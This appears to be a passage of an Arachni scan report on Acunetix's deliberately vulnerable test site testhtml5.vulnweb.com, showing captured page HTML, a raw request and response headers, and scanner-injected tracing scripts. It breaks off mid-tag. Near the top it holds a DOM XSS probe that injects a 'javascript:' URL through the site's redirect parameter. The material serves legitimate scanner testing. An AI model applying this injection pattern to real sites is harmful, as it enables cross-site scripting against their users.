<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/controllers/controllers.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/services/itemsService.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://bxss.s3.amazonaws.com/ad.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script><iframe name="ads_ads_frame" src="http://ads.bxss.me/ad_server.php?zone_id=234&ad_client=723898932&u_h=1080&u_w=1920&pn=&ref=&url=http://testhtml5.vulnweb.com/#/redir?url=javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//&" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" frameborder="0" height="1" scrolling="no" width="1" style="background-color:#FFFFFF;"></iframe> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> </body></html> |
This is the original HTTP response body.
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 | <script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()":{"stop_at_first":false,"trace":true},"username":{"stop_at_first":true,"trace":false},"admin":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <!DOCTYPE html> <html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp"> <head> <meta charset="utf-8"> <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content=""> <meta name="author" content=""> <!-- Le styles --> <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet"> <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'> <link href="/static/css/style.css" rel="stylesheet"> <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico"> <style type="text/css"> body { padding-top: 60px; padding-bottom: 40px; } .sidebar-nav { padding: 9px 0; } @media (max-width: 980px) { /* Enable use of floated navbar text */ .navbar-text.pull-right { float: none; padding-left: 5px; padding-right: 5px; } } </style> </head> <body> <div class="navbar navbar-fixed-top"> <div class="navbar-inner"> <div class="container-fluid"> <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a> <p class="navbar-text pull-left"> Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>. </p> <p class="navbar-text pull-right"> Welcome <b>admin</b> | <a href='/logout'>Logout</a> </p> </div> </div> </div> <div class="container-fluid"> <div class="row-fluid"> <div class="span2"> <div class="well sidebar-nav"> <ul class="nav nav-list"> <li class="nav-header">Views</li> <li id="popularLi" class="active"><a href="#/popular">Popular</a></li> <li><a href="#/latest">Latest</a></li> <li><a href="#/carousel">Carousel</a></li> <li><a href="#/archive">Archive</a></li> <li class="nav-header">Website</li> <li><a href="#/about">About</a></li> <li><a href="#/contact">Contact</a></li> <li class="nav-header">Acunetix</li> <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li> <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li> <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li> <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li> </ul> </div><!--/.well --> </div><!--/span--> <div class="span10"> <div class="row-fluid"> <div ng-view></div> </div><!--/row--> </div><!--/span--> </div><!--/row--> <hr> <div class="row-fluid"> <div class="pull-left" style="font-size: xx-small;" id="refId"></div> </div> <div style="background-color:lightgray;width:100%;text-align:center;font-size:14px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p> </div> <footer> <p class="pull-left">© Acunetix Ltd. 2019</p> </footer> </div><!--/.fluid-container--> <!-- Modal --> <div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true"> <form class="modal-body" action="/login" method="POST" id="loginForm"> <div class="modal-header"> <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button> <h3 id="myModalLabel">Login</h3> </div> <div class="modal-body"> <div class="control-group"> <!-- Username --> <label class="control-label" for="username">Username</label> <div class="controls"> <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin"> </div> </div> <div class="control-group"> <!-- Password--> <label class="control-label" for="password">Password</label> <div class="controls"> <input type="password" id="password" name="password" placeholder="" class="input-xlarge"> </div> </div> <div class="control-group"> <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a> </div> </div> <div class="modal-footer"> <button class="btn btn-primary" id="loginFormSubmit">Login</button> <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button> </div> </form> </div> <!-- Le javascript ================================================== --> <!-- Placed at the end of the document so the pages load faster --> <script src="http://code.jquery.com/jquery-1.9.1.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <!-- App libs --> <script src="/static/app/app.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/libs/sessvars.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/post.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/controllers/controllers.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="/static/app/services/itemsService.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://bxss.s3.amazonaws.com/ad.js"> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> </body> </html> |
Transitions describe the steps required to restore the state of the page, to the one it had when it was processed by the scanner, as a series of events. In essence, each transition represents a user interaction.
| # | Time | Event | Element | Options | ||
|---|---|---|---|---|---|---|
| 0 | 9.163898 | load |
page
|
|
||
| 1 | 3.86217 | request |
http://testhtml5.vulnweb.com/ |
|
||
| 2 | 3.554117 | request |
http://testhtml5.vulnweb.com/static/app/services/itemsService.js |
|
||
| 3 | 0.30496 | request |
http://testhtml5.vulnweb.com/ajax/popular?offset=0 |
|
||
| 4 | 0.812222 | request |
http://testhtml5.vulnweb.com/static/app/partials/itemsList.html |
|
||
| 5 | 0.570796 | request |
http://testhtml5.vulnweb.com/static/scr/default.png |
|
Raw HTTP request used to retrieve the page.
GET / HTTP/1.1 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.4 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,* Host: testhtml5.vulnweb.com
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Server: nginx/1.4.1
Date: Mon, 26 Jan 1970 06:56:47 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
Content-Encoding: gzip
<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;
/* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->
<!DOCTYPE html>
<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">
<head>
<meta charset="utf-8">
<title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta name="description" content="">
<meta name="author" content="">
<!-- Le styles -->
<link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">
<link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
<link href="/static/css/style.css" rel="stylesheet">
<link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico">
<style type="text/css">
body {
padding-top: 60px;
padding-bottom: 40px;
}
.sidebar-nav {
padding: 9px 0;
}
@media (max-width: 980px) {
/* Enable use of floated navbar text */
.navbar-text.pull-right {
float: none;
padding-left: 5px;
padding-right: 5px;
}
}
</style>
</head>
<body>
<div class="navbar navbar-fixed-top">
<div class="navbar-inner">
<div class="container-fluid">
<button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a>
<p class="navbar-text pull-left">
Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.
</p>
<p class="navbar-text pull-right">
<a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a>
</p>
</div>
</div>
</div>
<div class="container-fluid">
<div class="row-fluid">
<div class="span2">
<div class="well sidebar-nav">
<ul class="nav nav-list">
<li class="nav-header">Views</li>
<li id="popularLi" class="active"><a href="#/popular">Popular</a></li>
<li><a href="#/latest">Latest</a></li>
<li><a href="#/carousel">Carousel</a></li>
<li><a href="#/archive">Archive</a></li>
<li class="nav-header">Website</li>
<li><a href="#/about">About</a></li>
<li><a href="#/contact">Contact</a></li>
<li class="nav-header">Acunetix</li>
<li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>
<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>
<li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>
<li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>
<li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>
</ul>
</div><!--/.well -->
</div><!--/span-->
<div class="span10">
<div class="row-fluid">
<div ng-view></div>
</div><!--/row-->
</div><!--/span-->
</div><!--/row-->
<hr>
<div class="row-fluid">
<div class="pull-left" style="font-size: xx-small;" id="refId"></div>
</div>
<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">
<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>
</div>
<footer>
<p class="pull-left">© Acunetix Ltd. 2019</p>
</footer>
</div><!--/.fluid-container-->
<!-- Modal -->
<div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
<form class="modal-body" action="/login" method="POST" id="loginForm">
<div class="modal-header">
<button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
<h3 id="myModalLabel">Login</h3>
</div>
<div class="modal-body">
<div class="control-group">
<!-- Username -->
<label class="control-label" for="username">Username</label>
<div class="controls">
<input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin">
</div>
</div>
<div class="control-group">
<!-- Password-->
<label class="control-label" for="password">Password</label>
<div class="controls">
<input type="password" id="password" name="password" placeholder="" class="input-xlarge">
</div>
</div>
<div class="control-group">
<a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a>
</div>
</div>
<div class="modal-footer">
<button class="btn btn-primary" id="loginFormSubmit">Login</button>
<button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>
</div>
</form>
</div>
<!-- Le javascript
================================================== -->
<!-- Placed at the end of the document so the pages load faster -->
<script src="http://code.jquery.com/jquery-1.9.1.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<!-- App libs -->
<script src="/static/app/app.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/libs/sessvars.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/post.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/controllers/controllers.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="/static/app/services/itemsService.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://bxss.s3.amazonaws.com/ad.js">
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
</body>
</html>
This is the browser-evaluated body, as a result of the listed transitions.
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 | <html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp" class="ng-scope" data-arachni-id="1909442962"><head><script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <meta charset="utf-8"> <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content=""> <meta name="author" content=""> <!-- Le styles --> <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet"> <link href="http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic" rel="stylesheet" type="text/css"> <link href="/static/css/style.css" rel="stylesheet"> <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico"> <style type="text/css"> body { padding-top: 60px; padding-bottom: 40px; } .sidebar-nav { padding: 9px 0; } @media (max-width: 980px) { /* Enable use of floated navbar text */ .navbar-text.pull-right { float: none; padding-left: 5px; padding-right: 5px; } } </style> <style type="text/css">@charset "UTF-8";[ng\:cloak],[ng-cloak],[data-ng-cloak],[x-ng-cloak],.ng-cloak,.x-ng-cloak{display:none;}ng\:form{display:block;}</style></head> <body> <div class="navbar navbar-fixed-top"> <div class="navbar-inner"> <div class="container-fluid"> <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse"> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a class="brand" href="https://www.acunetix.com/" data-arachni-id="-59717636"><img src="/static/img/logo2.png" alt="Acunetix website security"> </a> <p class="navbar-text pull-left"> Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/" data-arachni-id="-1395254329">Acunetix Web Vulnerability Scanner</a>. </p> <p class="navbar-text pull-right"> <a href="#myModal" role="button" class="btn" data-toggle="modal" data-arachni-id="73596745">Login</a> </p> </div> </div> </div> <div class="container-fluid"> <div class="row-fluid"> <div class="span2"> <div class="well sidebar-nav"> <ul class="nav nav-list"> <li class="nav-header">Views</li> <li id="popularLi" class="active"><a href="#/popular" data-arachni-id="1270713017">Popular</a></li> <li><a href="#/latest" data-arachni-id="-2026013785">Latest</a></li> <li><a href="#/carousel" data-arachni-id="67552640">Carousel</a></li> <li><a href="#/archive" data-arachni-id="916551842">Archive</a></li> <li class="nav-header">Website</li> <li><a href="#/about" data-arachni-id="63058797">About</a></li> <li><a href="#/contact" data-arachni-id="-1678787584">Contact</a></li> <li class="nav-header">Acunetix</li> <li><a target="_blank" href="http://www.acunetix.com/" data-arachni-id="-1405978501">Website</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/" data-arachni-id="166919624">HTML5 scanner</a></li> <li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/" data-arachni-id="-1519928118">HTML5 vuln help</a></li> <li><a target="_blank" href="http://www.acunetix.com/blog/" data-arachni-id="2073538">Blog</a></li> <li><a target="_blank" href="http://www.facebook.com/Acunetix" data-arachni-id="561774310">Facebook</a></li> <li><a target="_blank" href="http://www.twitter.com/acunetix/" data-arachni-id="748307027">Twitter</a></li> </ul> </div><!--/.well --> </div><!--/span--> <div class="span10"> <div class="row-fluid"> <div ng-view=""><script src="http://javascript.browser.arachni/polyfills.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script class="ng-scope"> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <div id="loader" class="ng-scope" style="display: none;"> Loading ... <i class="icon-spinner icon-spin icon-2x pull-left"></i> </div> <div data-ng-include="'/static/app/partials/itemsList.html'" class="ng-scope"><script src="http://javascript.browser.arachni/polyfills.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js" class="ng-scope"></script> <!-- Injected by Arachni::Browser::Javascript --> <script class="ng-scope"> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <div class="row-fluid ng-scope"> <div class="pull-left"> <input type="text" placeholder="Filter results" ng-model="searchText" class="ng-pristine ng-valid" data-arachni-id="0"> </div> <div class="pull-right"> <div ng-show="filter==''">Page <span ng-bind-html-unsafe="pageStr" style="font-weight: bold;" class="ng-binding">0</span> </div> </div> <div class="pull-right"> <div ng-show="filter!=''" style="display: none;">Filtering for host <b class="ng-binding"></b></div> </div> </div> <!-- ngRepeat: item in items | filter:filter | filter:searchText --><div ng-repeat="item in items | filter:filter | filter:searchText" id="itemList" class="ng-scope"> <div class="well well-small shadow" style="overflow: hidden;"> <div class="span7"><a ng-href="https://twitter.com/bradhoylman/status/991408461203279872" target="_blank" href="https://twitter.com/bradhoylman/status/991408461203279872" data-arachni-id="-1241260543"><img ng-src="/static/scr/default.png" class="img-rounded" src="/static/scr/default.png"></a></div> <div class="span5 well well-small detailsbox"> <div class="row-fluid"> <div class="rating"> </div> </div> <div class="row-fluid"> <div class="muted pull-left" style="padding-bottom: 10px;"><a ng-href="#/all/filter/twitter.com" class="ng-binding" href="#/all/filter/twitter.com" data-arachni-id="-1830313082">twitter.com</a></div> <div class="muted pull-right" style="padding-bottom: 10px;"> <a class="btn btn-mini" ng-href="/like?id=696a3680438a7af53a0a54d3d26469bf" href="/like?id=696a3680438a7af53a0a54d3d26469bf" data-arachni-id="-466859719"><i class="icon-thumbs-up" title="Like"></i></a> <a class="btn btn-mini" ng-href="/comment?id=696a3680438a7af53a0a54d3d26469bf" href="/comment?id=696a3680438a7af53a0a54d3d26469bf" data-arachni-id="611572569"><i class="icon-comment" title="Comment"></i></a> <a class="btn btn-mini" ng-href="/report?id=696a3680438a7af53a0a54d3d26469bf" href="/report?id=696a3680438a7af53a0a54d3d26469bf" data-arachni-id="2002938079"><i class="icon-warning-sign" title="Report"></i></a> </div> </div> <a ng-href="#/redir?url=https://twitter.com/bradhoylman/status/991408461203279872" href="#/redir?url=https://twitter.com/bradhoylman/status/991408461203279872"><div class="detailsboxTitle ng-binding">Senator Brad Hoylman</div></a> <hr> <div class="row-fluid" style="margin-top: 15px; margin-bottom: 15px;"> <div class=""><b class="ng-binding">1</b> tweets from <!-- ngRepeat: user in item.value.users --><span ng-repeat="user in item.value.users" class="ng-scope"> <a 